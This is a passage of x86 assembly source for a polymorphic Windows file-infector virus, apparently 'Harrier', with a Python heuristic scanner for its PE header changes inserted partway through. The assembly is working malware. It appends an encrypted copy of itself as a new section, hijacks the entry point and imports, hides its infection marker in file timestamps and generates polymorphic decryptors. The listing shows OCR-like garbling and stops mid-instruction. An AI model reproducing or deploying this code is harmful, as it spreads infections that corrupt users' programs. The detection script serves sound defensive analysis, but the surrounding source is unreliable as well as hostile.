JE Infect_0 $

OR EDX, EDX

JNE INFECT_D $

Push 30h; Okonly ExclamationPush EBX

Push Offset Infnomenmsg

Push 0h

Call MessageBoxa; [!!! for debug !!!]

Push Memcommitsz / 4h

Call FreeStackMem

RET

Infect_d $: Push EBX

Push Edx

Push 21h; Okcancel Question

Push EBX

Push Edx

Push 0h

Call MessageBoxa; [!!! for debug !!!]

POP EDX

CMP EAX, 1H

POP EBX

JZ Infect_0 $

Push 30h; Okonly Exclamation

Push Ebx; Infecting Disabled

Push Offset Infcancelmsg; by Creator

Push 0h

Call Messageboxa

Push Memcommitsz / 4h

Call FreeStackMem

RET

Infect_0 $: Mov FileNamePtr, EDX; !!! Ready and Waiting !!!

Push Edx

Call getFileAttributesa; get file attributes

OR EAX, EAX

JZ Infect_f0 $

Mov FileAttributes, EAX

Push 80h; file_attribute_normal

Push DWORD PTR FileNamePtr

Call setFileAttributesa

Push 0h

PUSH 10000000H 80H; FAN, FFRA

Push 3h; OE

Push 0h

PUSH 1H; FSR

PUSH 80000000H 40000000H; GR / GW

Push DWORD PTR FileNamePtr

Call CreateFilea; Try to Open

CMP EAX, -1

JE Infect_f1 $

Mov FileHandle, EAX

Lea Eax, FileLastWrite; Storing File Date / Time

Push Eax; for Future Restoring

Lea Eax, FileLastAccess

Push EAX

Lea Eax, FileCreation

Push EAX

Push DWORD PTR FileHandle

Call getFiletime

Lea Eax, Ft_Struc; Checking Infection Flag

Push EAX

Lea Eax, FileLastWrite

Push EAX

Call filetimetosystemtime

MOV AX, FT_Year

ROL AX, 1

XOR AX, FT_MONTH

Ror Ax, 1

XOR AX, FT_DAY

ROL AX, 1

XOR AX, FT_HOUR

Ror Ax, 1

XOR AX, FT_MINUTE

ROL AX, 1

And Ax, 3ch

CMP AX, ft_second; already! Good.

JE Infect_f2 $

Mov Newseconds, AX

Push 0h

Lea Eax, Processedbytes; Read The Dos File

Push Eax; Header

Push 40h

Lea Eax, Dosheader

Push EAX

Push DWORD PTR FileHandle

Call readfile

OR EAX, EAX; Error Reading

JZ Infect_f2 $

CMP DWORD PTR ProcessedBytes, 40h

JNE INFECT_F2 $; Readed Less Ten 40h Bytescmp Word Ptr Dosheader, 'MZ'

JE Infect_f3 $

CMP Word PTR DOSHEADER, 'ZM'

JNE INFECT_F2 $

Infect_f3 $: CMP Word Ptr Dosheader [18h], 40h

JB Infect_f2 $

Push 0H; FileBegin

Push 0h

Push DWORD PTR DOSHEADER [3CH]

Push DWord PTR FileHandle; Seek to PE Header Start

Call setfilepointer

CMP EAX, -1

JE Infect_f2 $

Push 0h; read the peheader

Lea Eax, Processedbytes

Push EAX

Push Peheadersize

Lea Eax, Peheader

Push EAX

Push DWORD PTR FileHandle

Call readfile

OR EAX, EAX

JZ Infect_f2 $; Error READING

CMP DWORD PTR ProcessedBytes, Peheadersize

JNE INFECT_F2 $; Readed Too Less Bytes

CMP DWORD PTR PE_SIGN, 'EP'

JNE INFECT_F2 $

Movzx Eax, Word Ptr PE_NTHDRSIZE

Add Eax, DWORD PTR DOSHEADER [3CH]

Add Eax, 18h

Mov PefileHeaders, EAX

Push 0h; seek to seats descr.

Push 0h

Push EAX

Push DWORD PTR FileHandle

Call setfilepointer

Cmp Eax, -1; error seeking

JE Infect_f2 $

Movzx ECX, Word PTR PE_NUMOFSESECTIONS

OR ECX, ECX; No Sections

JZ Infect_f2 $

Mov Eax, SECTSIZE

Mul ECX

Add Eax, PefileHeaders

Add Eax, SECTSIZE

CMP Eax, PE_HEADERSIZE; no room for new section !?

Ja Infect_f2 $

Mov DWORD PTR IMPORTLAL, 0H

XOR EDX, EDX

Movzx ECX, Word PTR PE_NUMOFSESECTIONS

Infect_as $: Inc EDX

Push ECX

Push Edx

Push 0h; read the section header

Lea Eax, Processedbytes

Push EAX

Push subjectsize

Lea Eax, Section

Push EAX

Push DWORD PTR FileHandle

Call readfile

POP EDX

POP ECX

OR EAX, EAX; Error Reading

JZ Infect_f2 $

CMP DWORD PTR ProcessedBytes, SECTSIZE

JNE INFECT_F2 $; Readed Too Less Bytes

CMP DWORD PTR IMPORTLAL, 0H

JNE INFECT_NS $; Import Already Detected!

Mov Eax, SECTRVA

CMP EAX, PE_IMPORTTABLERVA

Ja Infect_ns $

Mov Importrva, EAX

Add Eax, Sectvirtsize

CMP EAX, PE_IMPORTTABLERVAJBE INFECT_NS $

Mov Eax, SECTPHYSOFFS

Mov Importphysoffs, EAX

Mov Eax, SECTFLAGS

Mov importflags, EAX

Mov Importorder, EDX

Mov DWORD PTR IMPORTLAL, -1

Infect_ns $: DEC ECX

JNZ Infect_as $

CMP DWORD PTR IMPORTLAL, 0H

JZ Infect_f2 $; import not found?!

MOV Eax, DWORD PTR SelfsectionName

Mov SelfsectName, Eax; Setup Self section Name

MOV Eax, DWORD PTR SelfsectionName 4

Mov SelfsectName 4, EAX

Mov Eax, SECTRVA

Add Eax, Sectvirtsize

MOV EBX, PE_ObjectAlign

Call AlignDwordondWord

Mov SelfseCtrva, Eax; Setup Self SECT. RVA & FLAGS

Mov DWORD PTR SelfsectFlags, 0e0000040H; R / W / E, Idata

Push 2h; seek to eof

Push 0h

Push 0h

Push DWORD PTR FileHandle

Call setfilepointer

CMP EAX, -1

JE Infect_f2 $

Push Eax; Setup Self Seption

MOV EBX, PE_FILALIGN; Physical Offset

Call AlignDwordondWord

Mov SelfsectPhysoffs, EAX

POP EBX

Sub Eax, EBX

JZ Infect_noprea $

Push Eax; Need File Alignment

MOV ECX, EAX

Lea EDI, Verylargebuffer

CLD

XOR Al, Al

Rep Stosb

POP ECX

Push ECX

Push 0h

Lea Eax, ProcessedBytes; Write Some Null's Into

Push Eax; Fucking File

Push ECX

Lea Eax, VeryLargebuffer

Push EAX

Push DWORD PTR FileHandle

Call writefile

OR EAX, EAX

POP ECX

JZ Infect_f2 $

CMP ECX, ProcessedBytes

JNE INFECT_F2 $

Infect_noprea $: xor EBX, EBX

Lea Edi, Verylargebuffer; Transfer Self to Memory

Mov ESI, Offset Start

Infect_Trans $: MOV Al, [ESI] [EBX]

MOV [EDI] [EBX], Al

Inc EBX

CMP EBX, StubimportPlace

JB infect_trans $

Mov Eax, 9h; Generate The Set of

Call Random; Polymorphic Cryptors

Add Eax, 8h; In Range (8..16)

Mov Cryptcnt, EAX

Lea Eax, VeryLargebuffer

Add Eax, StubimportPlace

Mov Edi, EAX

Mov Eax, fixupscounter; Depend on Pelink

SHL EAX, 2H; Tool Linking Strategy!

Add Eax, Fixupsplacemov Gencrsz, EAX

XOR EAX, EAX

Mov gensz, EAX

Mov Gentotalsz, EAX

Infect_gen $: Add Edi, 1000h; Maximal Encryptor Size!

Infect_gen_a $: Lea ESI, [EDI-1000H]

MOV ECX, Gencrsz

Push EDI

Push Eax; Make the Cryptor PAIRS

Call genpolymorph

POP EAX

POP EDI

CMP EBX, 1000H

Ja Infect_gen_a $

Mov Cryptors [EAX * 8], EBX; Encryptor Size

Mov Cryptors [EAX * 8 4], EDX; Decryptor Size

Add gensz, EDX

Add gencrsz, EDX

Add Gentotalsz, EDX

Add Gentotalsz, EBX

XCHG ESI, EDI

MOV ECX, EDX

CLD; Pack Cryptors

REP MOVSB

INC EAX

CMP EAX, CRYPTCNT

JB infect_gen $

Lea EDI, Verylargebuffer

Mov EBX, Here

Mov ESI, FIXUPSPLACE

MOV ECX, Fixupscounter; Undo fixups

Infect_undo1 $: MOV Eax, [ESI] [EBX]

SUB [EDI] [EAX], EBX

Add ESI, 4H

Dec ECX

JNZ Infect_undo1 $

Mov Eax, Gensz; Setup Polymorph Sizes

Mov Edx, Offset Polymorphsz

Sub EDX, EBX

MOV [EDI] [EDX], EAX

MOV EAX, PE_ENTRYPOINTRVA; Setup Entrypoint

Mov Edx, Offset StubenTrylabel

Sub EDX, EBX

MOV [EDI] [EDX], EAX

Mov Eax, SelfseCtrva; Setup SelfPlace

Mov Edx, Offset Currentplace

Sub EDX, EBX

MOV [EDI] [EDX], EAX

MOV EAX, PE_IMAGEBASE; Setup Imageplace

Mov Edx, Offset Imageplace

Sub EDX, EBX

MOV [EDI] [EDX], EAX

Mov Eax, 1H; Setup Initialization Flag

Mov Edx, Offset INITOK

Sub EDX, EBX

MOV [EDI] [EDX], EAX

MOV ESI, ImportPlace; Resetup Import Directory

MOV ECX, ImportLength

Infect_undo2 $: MOV EDX, [ESI] [EBX]; Get Lookup Pointer

Sub EDX, CURRENTPLACE

Sub EDX, POLYMORPHSZ

Push Edx

Infect_un_2 $: MOV Eax, [EDX] [EBX]; Resetup Lookup Table

OR EAX, EAX

JZ Infect_un_1 $

Sub Eax, CurrentPlace

Sub Eax, Polymorphsz

Add Eax, SelfseCtrva

Add Eax, Gensz

MOV [EDI] [EDX], EAX

Add Edx, 4H

JMP infect_un_2 $

Infect_un_1 $: POP EDX

Add Edx, SelfseCtrva; Resetup Lookup Ptr

Add Edx, Gensz

MOV [EDI] [ESI], EDX

MOV EDX, [ESI] [EBX] + 3 * 4; Resetup Name Ptr

Sub EDX, CURRENTPLACE

Sub EDX, POLYMORPHSZ

Add Edx, SelfseCtrva

Add Edx, Gensz

MOV [EDI] [ESI] 3 * 4, EDX

MOV EDX, [ESI] [EBX] 4 * 4; Resetup IMPRTADDRESS PTR

Sub EDX, CURRENTPLACE

Sub EDX, POLYMORPHSZ

Add Edx, SelfseCtrva

Add Edx, Gensz

MOV [EDI] [ESI] 4 * 4, EDX

Add ESI, 5 * 4

SUB ECX, 5 * 4

Ja Infect_undo2 $

Lea ESI, VeryLargebuffer; Crypt the Self Body

Mov ECX, StubimportPlace; Before Writing IT

Add Ecx, Gentotalsz; INTO DESIRED FILE

Add ESI, ECX

Mov EDI, ESI

Add Edi, Gensz

Dec Edi

Dec ESI

Std; Place Buffer AT

Rep Movsb; Program Start

Mov ESI, StubimportPlace

Add ESI, EDI

XOR EAX, EAX

Infect_crypt $: Push EAX

Mov ECX, Cryptors [EAX * 8 + 4]

Lea EBX, [ESI + 1]

Add ESI, ECX

Add ESI, Cryptors [EAX * 8]

PUSH ESI

Push EDI

STD

REP MOVSB

Xchg EDI, [ESP]

Inc EDI

Push EBP

Push EDI

Call EBX; CRYPT by One Cryptor

POP EBP

POP EDI

POP ESI

POP EAX

INC EAX

CMP EAX, CRYPTCNT

JB Infect_crypt $

CLD

MOV ECX, StubimportPlace

Add ECX, GENSZ

Push ECX

Push 0H; Write Self Body

Lea Eax, ProcessedBytes; File Pointer

Push Eax; Must Be at File EOF

Push ECX

Lea Eax, VeryLargebuffer

Push EAX

Push DWORD PTR FileHandle

Call writefile

OR EAX, Eax; Error Writing

POP EAX

JZ Infect_f2 $

CMP EAX, Processedbytes

JNE INFECT_F2 $; TOO Less Bytes Written

MOV EAX, PE_IMPORTTABLERVA; Calculate Import Place

Sub eax, importrva; in file

Add Eax, Importphysoffs

Push 0h

Push 0h

Push EAX

Push DWORD PTR FILEHANDLE; and Seek in File At

Call setfilepointer; this position

CMP EAX, -1

JE Infect_f2 $; Error Seeking

Lea EBX, VeryLargebuffer

Infect_Trans1 $: Push EBX

Push 0h

Lea Eax, ProcessedBytes; Read The Next Import Record

Push EAX

PUSH 5 * 4

Push EBX

Push dword PTR FileHandle

Call Readfile

POP EBX

OR EAX, EAX

JZ Infect_f2 $; Errors.

CMP DWORD PTR ProcessedBytes, 5 * 4

JNE INFECT_F2 $

Add Ebx, 5 * 4; Last Import Record???

CMP DWORD PTR [EBX] [3 * 4] [- 5 * 4], 0H

JNE INFECT_TRANS1 $

Lea Eax, VeryLargebuffer

SUB EBX, EAX

Push EBX

Push 2h; seek to eof

Push 0h

Push 0h

Push DWORD PTR FileHandle

Call setfilepointer

POP EBX

CMP EAX, -1; Errors.

JE Infect_f2 $

Push EBX

Push 0h; Write All Import Records

Lea Eax, ProcessedBytes; to Target File

Push EAX

Push EBX

Lea Eax, VeryLargebuffer

Push EAX

Push DWORD PTR FileHandle

Call writefile

POP EBX

OR EAX, EAX; Errors..

JZ Infect_f2 $

CMP ProcessedBytes, EBX

JNE INFECT_F2 $

Add Ebx, ImportLength; Calculate The New Import

MOV PE_IMPORTDATASZ, EBX; SIZE AND RVA

Mov Eax, SelfseCtrva

Add Eax, Gensz

Add Eax, Importplace

MOV PE_IMPORTTABLERVA, EAX

Lea Edi, Verylargebuffer; Generate Some Random Trash

Mov Eax, 100H

Call Random

Lea ECX, [EAX + 10h]

Push ECX

CLD

Infect_trash $: MOV Eax, 100H

Call Random

Stosb

Dec ECX

JNZ Infect_Trash $

MOV ECX, [ESP]

Push 0h; and write it inTo

Lea Eax, ProcessedBytes; Fucking File, At Them

Push eax; end

Push ECX

Lea Eax, VeryLargebuffer

Push EAX

Push DWORD PTR FileHandle

Call writefile

OR EAX, EAX; Error Writing!

POP EAX

JZ Infect_f2 $

CMP Eax, ProcessedBytes; Too Less Bytes Written

JNE INFECT_F2 $

Push 2h; seek to eof

Push 0h

Push 0h

Push DWORD PTR FileHandle

Call setfilepointer

CMP EAX, -1; Seeking Failure

JE Infect_f2 $

Sub Eax, SelfsectPhysoffs; Setup SECTION SIZES

Mov SelfsectVirtsize, EAX

MOV EBX, PE_FILALIGN

Call AlignDwordondWord

Mov SelfsectPhysize, EAX

Sub eax, SelfsectVirtsize

JZ Infect_todone $; NEED File Align?

MOV ECX, EAX

Push ECX

MOV Al, 0H; Prepare Aligning Buffer

Cld

Lea EDI, Verylargebuffer

Rep Stosb

POP ECX

Push ECX; and align the file

Push 0h

Lea Eax, Processedbytes

Push EAX

Push ECX

Lea Eax, VeryLargebuffer

Push EAX

Push DWORD PTR FileHandle

Call writefile

POP ECX

OR EAX, EAX; Error Writing!

JZ Infect_f2 $

CMP DWORD PTR ProcessedBytes, ECX

JNE INFECT_F2 $; TOO Less Bytes Written

Infect_todone $: MOV Eax, SelfsectVirtsize; Setup Memory Requirement

MOV EBX, PE_ObjectAlign

Call AlignDwordondWord

Add PE_IMAGESIZE, EAX

Add PE_SIZEOFIDATA, EAX

Mov Eax, SelfseCtrva; Setup Self Entrypoint

MOV PE_ENTRYPOINTRVA, EAX

MOV EAX, PE_STACKRESERVESZ; Setup Stack Size

Add Eax, Memcommitsz; (For Placing Temporary)

MOV PE_STACKRESERVESZ, EAX; buffer

Movzx Eax, Word Ptr PE_NUMOFSECTIONS

Mov ECX, SECTSIZE

Mul ECX

Add Eax, PefileHeaders

Push 0h; prepare to write

Push 0H; Selfsection Descriptor

Push EAX

Push DWORD PTR FileHandle

Call setfilepointer

CMP EAX, -1; Errors.

JE Infect_f2 $

Push 0h; and write it!

Lea Eax, Processedbytes

Push EAX

Push SelfsectSize

Lea Eax, Selfsection

Push EAX

Push DWORD PTR FileHandle

Call writefile

OR EAX, EAX

JZ Infect_f2 $; Errors.

CMP DWORD PTR ProcessedBytes, SelfsectSize

JNE INFECT_F2 $

Mov ECX, DWORD PTR IMPORTORDER

Mov Eax, SECTSIZE; Prepare to Write Import

Mul Ecx; section Flags

Add Eax, PefileHeaders; Warning !!!

Sub Eax, 4H; Import Section Flags

Push 0h; is the last field in

Push 0H; section Header Structure

Push eax; !!!!!!!!!!!!!!!!!!!!!!!

Push DWORD PTR FileHandle

Call setfilepointer

CMP EAX, -1H; Seeking Failure

JE Infect_f2 $

OR DWORD PTR IMPORTFLAGS, 0C0000000H

Push 0h; enable reading

Lea Eax, Processedbytes; and Writing

Push Eax; In Import Section

Push 4h

Lea Eax, Importflags

Push EAX

Push DWORD PTR FileHandle

Call writefile

OR EAX, EAX

JZ Infect_f2 $; Errors.

CMP DWORD PTR ProcessedBytes, 4H

JNE INFECT_F2 $

Inc Word Ptr PE_NUMOFSECTIONS; New # of Sections

Push 0h; prepare to Writing

Push 0h; pehader

Push DWORD PTR DOSHEADER [3CH]

Push DWORD PTR FileHandle

Call setfilepointer

CMP EAX, -1

JE Infect_f2 $

Push 0h

Lea Eax, Processedbytes

Push EAX

Push peheadersize; and write it

Lea Eax, Peheader

Push EAX

Push DWORD PTR FileHandle

Call writefile

OR EAX, EAX

JZ Infect_f2 $; Errors.

CMP DWORD PTR ProcessedBytes, Peheadersize

JNE INFECT_F2 $

MOV AX, NewSeconds; OK! Set Infection Flag.

MOV FT_SECOND, AX

Lea Eax, FileLastWrite

Push EAX

Lea Eax, ft_struc

Push EAX

Call SystemTimeToFileTime

Infect_f2 $: Lea Eax, FileLastWrite; Restore File Date / Time

Push EAX

Lea Eax, FileLastAccess

Push EAX

Lea Eax, FileCreation

Push EAX

Push DWORD PTR FileHandle

Call setFiletime

Push DWORD PTR FileHandle; Close Our File. Ooh, Yes!

Call Closehandle

Infect_f1 $: Push Dword PTR FileAttributes; Restore File Attributes

Push DWORD PTR FileNamePtr

Call setFileAttributesa

Infect_f0 $: Push Memcommitsz / 4h

Call FreeStackMem

RET
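The header edits this routine makes are exactly what a file scanner can look for: a new last section that receives the entry point and the import directory, the original import section's flags OR'd with 0C0000000h (read + write), and SizeOfImage grown by the aligned size of the new section. The Python checker below is an added example, not part of the Harrier source or any scanner's code; it parses the PE headers with the standard struct module, builds two header-only sample images whose section names, RVAs and sizes are constructed test data, and reports which of those markers each one shows.

```python
"""Heuristic check for the PE header changes made by the infection routine above.
Added example (not part of the Harrier source): section names, RVAs and sizes
in the sample images are constructed test data."""
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HDR = "<8sIIIIIIHHI"          # IMAGE_SECTION_HEADER, 40 bytes


def parse_pe(pe):
    """Return (entry_rva, import_dir_rva, sections) read from a PE image's headers."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]       # NumberOfSections
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]  # SizeOfOptionalHeader
    opt = e_lfanew + 24                                        # optional header start
    magic = struct.unpack_from("<H", pe, opt)[0]
    entry = struct.unpack_from("<I", pe, opt + 16)[0]          # AddressOfEntryPoint
    datadir = opt + (96 if magic == 0x10B else 112)            # PE32 vs PE32+
    import_rva = struct.unpack_from("<I", pe, datadir + 8)[0]  # directory entry 1: imports
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, _, _, _, _, _, chars = struct.unpack_from(
            SECTION_HDR, pe, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "size": max(vsize, rawsize), "chars": chars})
    return entry, import_rva, sections


def section_of(sections, rva):
    """Section whose virtual range covers rva, or None."""
    for s in sections:
        if s["va"] <= rva < s["va"] + s["size"]:
            return s
    return None


def suspicious_markers(pe):
    """List the markers the routine above leaves: entry point and import directory
    relocated into an appended last section, a writable import section, and a
    last section that is both writable and executable."""
    entry, import_rva, sections = parse_pe(pe)
    last = sections[-1]
    imp = section_of(sections, import_rva)
    findings = []
    if len(sections) > 1 and section_of(sections, entry) is last:
        findings.append("entry point in last section")
    if len(sections) > 1 and imp is last:
        findings.append("import directory in last section")
    if imp is not None and imp["chars"] & IMAGE_SCN_MEM_WRITE:
        findings.append("import directory section is writable")
    if last["chars"] & IMAGE_SCN_MEM_WRITE and last["chars"] & IMAGE_SCN_MEM_EXECUTE:
        findings.append("last section is writable and executable")
    return findings


def build_pe(sections, entry, import_rva):
    """Build a header-only PE32 image (constructed test input, carries no code)."""
    e_lfanew = 0x40
    dos = b"MZ" + bytes(0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 224                      # PE32 optional header with 16 data directories
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    struct.pack_into("<I", opt, 16, entry)                # AddressOfEntryPoint
    struct.pack_into("<I", opt, 92, 16)                   # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 104, import_rva, 0x100)  # import directory RVA / size
    table = b"".join(
        struct.pack(SECTION_HDR, name.encode().ljust(8, b"\0"), size, va, size, 0, 0, 0, 0, 0, chars)
        for name, va, size, chars in sections)
    return dos + coff + bytes(opt) + table


# Constructed samples: a clean layout, and one shaped like the routine's output
# (extra last section holding entry point and imports, original import section made RW).
CLEAN = build_pe([(".text", 0x1000, 0x1000, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | 0x20),
                  (".rdata", 0x2000, 0x1000, IMAGE_SCN_MEM_READ | 0x40),
                  (".data", 0x3000, 0x1000, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | 0x40)],
                 entry=0x1100, import_rva=0x2040)
INFECTED = build_pe([(".text", 0x1000, 0x1000, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | 0x20),
                     (".rdata", 0x2000, 0x1000, IMAGE_SCN_MEM_READ | 0x40 | 0xC0000000),
                     (".data", 0x3000, 0x1000, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | 0x40),
                     (".added", 0x4000, 0x3000, 0xE0000020)],
                    entry=0x4000, import_rva=0x4800)

if __name__ == "__main__":
    for label, image in (("clean", CLEAN), ("infected-shaped", INFECTED)):
        print(label, suspicious_markers(image) or ["no markers"])
```

Each marker on its own is weak (run-time packers produce the same last-section shape), so treat the list as a triage signal and confirm on the file itself; the routine's other trace, the seconds value it stamps into the last-write time, is a separate check whose value is not given in this part of the listing.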

; ------------------------------------------------- ------------

; Service routines

;

AllocStackMem: Pop Eax; Allocate Memory in Stack

POP ECX; Corrupt Eax, ECX !!!

Push EBP; Do Not Uses Call Stack

Allocstack_1 $: Push 0h; Before this Call

Dec ECX

JNZ Allocstack_1 $

MOV EBP, ESP

Push EAX

RET

FreeStackMem: Pop Eax; Free Memory In Stack

POP ECX; Corrupt Eax, ECX !!!

FreeStack_1 $: Pop DropdWord; Do Not Use Stack

Dec Ecx; Memory After this Call

JNZ FreeStack_1 $

POP EBP

Push EAX

RET

DROPDWORD DD ?

AlignDWordondWord:

Push Edx

XOR EDX, EDX; Align Eax by EBX Boundary

Push EAX

Div EBX

POP EAX

OR EDX, EDX

JZ Aligndword_0 $

Sub Eax, EDX

Add Eax, EBX

AligndWord_0 $: POP EDX

RET

; ------------------------------------------------- ------------

; My string converter ;-)

Convertstr: CLD; Convert Some String

Call initconverter; in Edx with

MOV ESI, EDX; POSSIBLY Length in ECX

Lea EDI, Smallbuffer; (Corrupt EDI, ESI, EAX)

PUSH ESI

Push EDI

Push ECX

Push EBX

CMP ECX, -1H

JE Convert_MODE1 $

OR ECX, ECX

JZ Convert_DOONE $

Convert_MODE0 $: CALL ProcessChar; Counter Mode

Dec ECX

JNZ Convert_MODE0 $

POP EBX

POP ECX

POP EDX

POP ECX

MOV BYTE PTR ES: [EDI], 0H

Sub EDI, EDX

MOV ECX, EDI

RET

Convert_MODE1 $: CALL Processchar; Asciz Mode

CMP Byte PTR [ESI] [- 1], 0H

JNE Convert_MODE1 $

POP EBX

POP ECX

POP EDX

POP EAX

RET

Convert_DOONE $: POP EBX

POP ECX

POP EDI

POP ESI

MOV BYTE PTR ES: [EDI], 0H

RET

Processchar: Lodsb; Process One Char, EMPTY

Stosb; Strings Are Not ALLOWED !!!

CMP Al, 'A'

JB Process_1 $; Upcase The Source Char

CMP Al, 'Z'

Ja Process_1 $

SUB Al, 20h

Process_1 $: Push ECX

Push EBX

Push Edx

Mov ECX, ConvertDatalen

XOR EBX, EBX; Try The Some Variants

Process_again $: MOV EDX, [EBX * 4] Convertvar

MOV AH, [EDX]

Inc DWORD PTR [EBX * 4] Convertvar

CMP Al, AH; Good Char?

JNE Process_bad $

CMP BYTE PTR [EDX] [1], 0H; Last Char in Variant?

JNE Process_Next $

Sub EDX, [EBX * 8] [ConvertData]

SUB EDI, EDX; Make the Replacing

Dec Edi

PUSH ESI

MOV ESI, [EBX * 8 + 4] [ConvertData]

Process_do $: Lodsb; Transfer The Real String

Stosb; converted by me ;-)

CMP Al, 0H

JNE Process_do $

Dec Edi

POP ESI

Push DWORD PTR [EBX * 8] [ConvertData]

POP DWORD PTR [EBX * 4] Convertvar

JMP Process_ok $

Process_bad $: Push DWORD PTR [EBX * 8] [ConvertData]

POP DWORD PTR [EBX * 4] Convertvar

Process_next $: inc Ebx; Next Variant

Dec ECX

JNZ Process_again $

Process_ok $: Pop Edx; Char Has Been Processed

POP EBX

POP ECX

RET

INITCONVERTER: PUSH EBX; Initconverter Routines

Push ECX

Mov ECX, ConvertDatalen

XOR EBX, EBX

INITCONV_1 $: Push DWORD PTR [EBX * 8] [ConvertData]

POP DWORD PTR [EBX * 4] Convertvar

Inc EBX

Dec ECX

JNZ INITCONV_1 $

POP ECX

POP EBX

RET

Transfer_str: CMP ECX, -1H; More Strict Strings

JE Transfer_s_m $; MOVING ROUTINE

OR ECX, ECX

JZ Transfer_s_d $

REP MOVSB

TRANSFER_S_D $: XOR Al, Al

Stosb

RET

TRANSFER_S_M $: LODSB

Stosb

OR Al, Al

JNZ Transfer_s_m $

RET

; ------------------------------------------------- ------------

; The polymorphic code has the following structure:

;               Pusha

;               Call Start

; ...

; SEM:          DD 1h

; ...

; Start:        POP basereg

;               XOR SEMREG, SEMREG (AND semreg, 0) (Mov SemReg, 0)

; Locksem:      XCHG [Basereg] [SEM], SEMREG

;               OR SEMREG, SEMREG (TEST SEMREG, SEMREG) (AND semreg, semreg)

;               JZ LOCKSEM

;               CMP SemReg, 2H

;               JE DONE

;               Add basereg, Codestart

;               Add [Basereg] [Border], Basereg

;               .Loadregisters

; Again:        .decrypt

;               Add Base, 4H (Inc Base) 4 Times

;               CMP Base, Border

;               JB Again

;               Sub Basereg, CodeStart + Codesize

; DONE:         MOV [Basereg] [SEM], 2H

;               POPA

; Codestart:

;

; All code is mixed with trash.. PREPARE to understand!

GENPOLYMORPH: Push ESI

Push EDI

Push ECX

Call getNoespreg; choose the 2 base

MOV PBASEREG, Al; Registers

MOV BL, Al; Base

GENPOLYM_R $: CALL GETNOESPREG

CMP BL, Al

JE GenPolym_R $

MOV Psemreg, Al; and Semaphore

Mov Byte Ptr PenableenCr, 0h

Mov ECX, 5H

Mov EBX, Offset GennoreGcom

Call Enumer

MOV Al, 60H; Pusha

Stosb

MOV AX, -1H

Mov EBX, Offset Genanycom

Call Enumer

MOV Al, 0e8h; Call $ ...

Stosb

Mov Eax, 50h

Call Random

Add Eax, 10h

Push EAX

Stosd

MOV PBASE, EDI

MOV ECX, EAX

GENPOLYM_C $: MOV EAX, 100H

Call Random

Stosb

Dec ECX

JNZ GENPOLYM_C $

POP EAX

Sub Eax, 4h

Call Random

MOV PSEM, EAX

Add Eax, PBASE; Setup Semaphore

Mov DWORD PTR [EAX], 1H

MOV Al, PBASEREG; POP Basereg

OR Al, 58H

Stosb

MOV AH, -1H

MOV Al, PBASEREG

Mov ECX, 5H

Mov EBX, Offset Genanycom

Call Enumer

MOV Eax, 2H; XOR SEMREG, SEMREG

Call Random

OR Al, Al

JZ genpolym_x $

MOV Al, 2H

Call Random

OR Al, Al

JZ genpolym_xm $

MOV Al, 81H; (AND)

Stosb

MOV Al, Psemreg

OR Al, 0E0H

Stosb

XOR EAX, EAX

Stosd

JMP genpolym_xd $

GenPolym_xm $: MOV Al, 0B8H; (MOV)

OR Al, Psemreg

Stosb

XOR EAX, EAX

Stosd

JMP genpolym_xd $

GENPOLYM_X $: MOV Al, 2H; (XOR)

Call Random

Add Eax, EAX

OR Al, 31H

Stosb

MOV Al, Psemreg

SHL Al, 3H

OR Al, Psemreg

OR Al, 0C0H

Stosb

GenPolym_XD $: MOV Al, Psemreg

MOV AH, PBASEREG

Call Enumer

MOV PXCHG, EDI

MOV Al, 87H; Xchg Semreg, [BaseReg] [SEM]

Stosb

MOV Al, Psemreg

SHL Al, 3H

OR Al, 80h

OR Al, PBASEREG

Stosb

MOV EAX, PSEM

Stosd

MOV Al, PBASEREG

Mov Ah, Psemreg

Call Enumer

Mov Eax, 4h; Or Semreg, SemReg

Call Random

JZ genpolym_oc $

MOV Al, 3H; (AND) (TEST) (OR)

Call Random

SHL Al, 3H

MOV CL, Al

Mov Eax, 092185H

SHR EAX, CL

CMP AL, 85H

JE GenPolym_o $

Push EAX

Mov Eax, 2h

Call Random

OR Al, Al

POP EAX

JZ genpolym_o $

OR Al, 2H

GenPolym_o $: stosb

MOV Al, Psemreg

SHL Al, 3H

OR Al, Psemreg

OR Al, 0C0H

Stosb

JMP genpolym_od $

GENPOLYM_OC $: MOV Al, 83H; (CMP)

Stosb

MOV Al, Psemreg

OR Al, 38h

OR Al, 0C0H

Stosb

XOR Al, Al

Stosb

GENPOLYM_OD $: MOV ECX, 5H

Mov EBX, Offset Gennoflagcom

Call Enumer

MOV AX, 840FH; JZ LOCKSEM

Stosw

Mov Eax, PXCHG

Sub Eax, 4h

Sub Eax, EDI

Stosd

MOV Al, PBaseReg

Mov Ah, Psemreg

Mov EBX, Offset Genanycom

Call Enumer

MOV Al, 83H; CMP SEMREG, 2H

Stosb

MOV Al, Psemreg

OR Al, 0F8H

Stosb

MOV Al, 2H

Stosb

Mov EBX, Offset Gennoflagcom

Call Enumer

MOV AX, 840FH; JZ DONE

Stosw

MOV PMOV, EDI

Stosd

MOV Al, PBASEREG

MOV AH, -1H

Mov EBX, Offset Genanycom

Call Enumer

MOV Al, 81H; Add Basereg, Codestart

Stosb

MOV Al, PBASEREG

OR Al, 0C0H

Stosb

MOV PBaseAdd, EDI

Stosd

MOV Al, PBASEREG

MOV AH, -1H

Call Enumer

MOV Al, 1H; Add [Basereg] [BRDR], BASEREG

